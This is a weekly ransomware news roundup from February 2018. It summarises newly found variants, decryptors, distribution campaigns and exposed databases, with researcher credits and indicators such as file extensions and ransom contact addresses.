Lots of small variants released this week, but surprisingly most are actually active and being distributed. The big stories are new distribution methods for GandCrab, decryptors for Cryakl variants and MoneroPay, and a new ransomware called Black Ruby.

Contributors and those who provided new ransomware information and stories this week include: @struppigel, @malwrhunterteam, @FourOctets, @jorntvdw, @DanielGallagher, @BleepinComputer, @campuscodi, @Seifreed, @demonslay335, @PolarToffee, @malwareforme, @LawrenceAbrams, @fwosar, @hexwaxwing, @GrujaRS, @bartblaze, @Alex_Ad, @JakubKroustek, @benkow_, @sacbee_news, @SophosLabs, and @secbydefault.

February 3rd 2018

CouchDB instances still being hit with some sort of ransomware

Benkow moʞuƎq found some CouchDB instances that are being affected by some sort of ransomware/hacker. 

RaruCrypt Ransomware discovered

Jakub Kroustek discovered the RaruCrypt Ransomware by Альберт Михайлович. Decrypt via RAR and password for the rar file is "S?{DCO^C!{L@CR^+<7E}2".

February 5th 2018

New Hermes 2.1 changes

MalwareHunterTeam found a new sample of the Hermes 2.1 Ransomware. Michael Gillespie said it is now using a new filemarker at the end of the file with an encrypted AES-256 key blob per file.

Decryptor for MoneroPay Ransomware

Alexander Adamov of NioGuard Security Labs created a decryptor for the MoneroPay ransomware.

New Jigsaw Ransomware variant discovered

Michael Gillespie found a new Jigsaw Ransomware variant that appends the .# extension to encrypted files. Michael's decryptor has been updated to handle this variant.

New Crypt12 Ransomware released

Michael Gillespie found a new variant of the Crypt12 Ransomware that uses the email hernansec@protonmail.ch email address. Michael has updated his decryptor.

February 6th 2018

Ransomware Victims Hit on Average by Two Attacks per Year

A study by Sophos of 2,700 IT professionals across the globe has revealed that 54% of organizations suffered a ransomware attack in the last year, and most organizations were hit more than twice, with the average number of ransomware per attacks being two.

Researcher Bypasses Windows Controlled Folder Access Anti-Ransomware Protection

A security researcher has found a way to bypass the "Controlled Folder Access" feature added in Windows 10 in October 2017, which Microsoft has touted as a reliable anti-ransomware defensive measure.

New Jigsaw Ransomware variant discovered

Michael Gillespie found a new Turkish Jigsaw Ransomware variant that appends the .justice extension to encrypted files. Michael's decryptor has been  updated to handle this variant.

New AdamLocker variant

Security researcher Bart discovered a new AdamLocker variant written in Korean. This variant appends the .adam extension to encrypted files.

February 8th 2018

GandCrab Ransomware Being Distributed Via Malspam Disguised as Receipts

A new malspam campaign is underway that is pretending to be PDF receipts, but instead installs the GandCrab ransomware on a victim's computer. This is done through a series of malicious documents that ultimately install the ransomware via a PowerShell script.

Honor Ransomware discovered

GrujaRS found a new My Little Ransomware variant called Honor Ransomware. This ransomware will append the extension .honor to encrypted files and scramble the file name, but does not drop a  ransom note.

California Voter Database Exposed Online (Again), Held for Ransom (Again)

For the second time in two months, the voter registration information of over 19 million Californians was leaked online via an unsecured MongoDB database, which was later held for ransom by hackers.

February 9th 2018

Black Ruby Ransomware Skips Victims in Iran and Adds a Miner for Good Measure

A new ransomware was discovered this week by MalwareHunterTeam called Black Ruby. This ransomware will encrypt the files on a computer, scramble the file name, and then append the BlackRuby extension. To make matters worse, Black Ruby will also install a Monero miner on the computer that utilizes as much of the CPU as it can.

DexCrypt MBRLocker Demands 30 Yuan To Gain Access to Computer

A new Chinese MBRLocker called DexLocker has been discovered that asks for 30 Yuan to get access to a computer. First discovered by security researcher JAMESWT, this ransomware will modify the master boot record of the victim's computer so that it shows a ransom note before Windows starts.

dcrtr Ransomware Found

Michael Gillespie was looking for a ransomware that appends the .[decryptor@cock.li].dcrtr extension and drops a ransom note named ReadMe_Decryptor.txt. The sample was by both Jakub Kroustek & MalwareHunterTeam.

New RotorCrypt variant

Michael Gillespie found a new RotorCrypt variant that appends the !decrfile@tutanota.com.crypo extension.


That's it for this week! Hope everyone has a nice weekend!


Related Articles:

Free Decrypter Available for the Latest GandCrab Ransomware Versions

The Week in Ransomware - December 7th 2018 - WeChat Ransomware, Scammers, & More

The Week in Ransomware - November 9th 2018 - Mostly Dharma Variants

The Week in Ransomware - October 26th 2018 - Decryptors, RaaS, and More

GandCrab Devs Release Decryption Keys for Syrian Victims